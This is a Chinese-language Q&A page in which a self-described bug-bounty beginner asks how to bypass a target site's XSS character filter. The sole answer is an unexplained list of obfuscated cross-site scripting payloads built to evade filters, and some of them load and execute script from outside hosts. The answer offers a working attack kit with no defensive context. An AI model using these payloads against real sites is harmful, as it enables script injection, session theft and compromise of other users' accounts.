如何绕过Firefox的XSS攻击过滤器?

时间:2019-05-03 21:36:33

标签: firefox xss

所以我检查了目标站点正在过滤的字符,然后我 发现它正在编码这些字符=,+,? ,:,&,% 它不会编码这些字符'()<>-“ \ * {} []。 是否可以绕过这些过滤器并进行xss攻击? 顺便说一句,我是有漏洞赏金的初学者。任何帮助将不胜感激!

1 个答案:

答案 0 :(得分:-1)

Awesome XSS Payloads

<A/hREf="j%0aavas%09cript%0a:%09con%0afirm%0d``">z
<d3"<"/onclick="1>[confirm``]"<">z
<d3/onmouseenter=[2].find(confirm)>z
<details open ontoggle=confirm()>
<script y="><">/*<script* */prompt()</script
<w="/x="y>"/ondblclick=`<`[confir\u006d``]>z
<a href="javascript%26colon;alert(1)">click
<a href=javas&#99;ript:alert(1)>click
<script/"<a"/src=data:=".<a,[8].some(confirm)>
<svg/x=">"/onload=confirm()//
<--`<img/src=` onerror=confirm``> --!>
<svg%0Aonload=%09((pro\u006dpt))()//
<sCript x>(((confirm)))``</scRipt x>
<svg </onload ="1> (_=prompt,_(1)) "">
<!--><script src=//14.rs>
<embed src=//14.rs>
<script x=">" src=//15.rs></script>
<!'/*"/*/'/*/"/*--></Script><Image SrcSet=K */; OnError=confirm`1` //>
<iframe/src \/\/onload = prompt(1)
<x oncut=alert()>x
<svg onload=write()>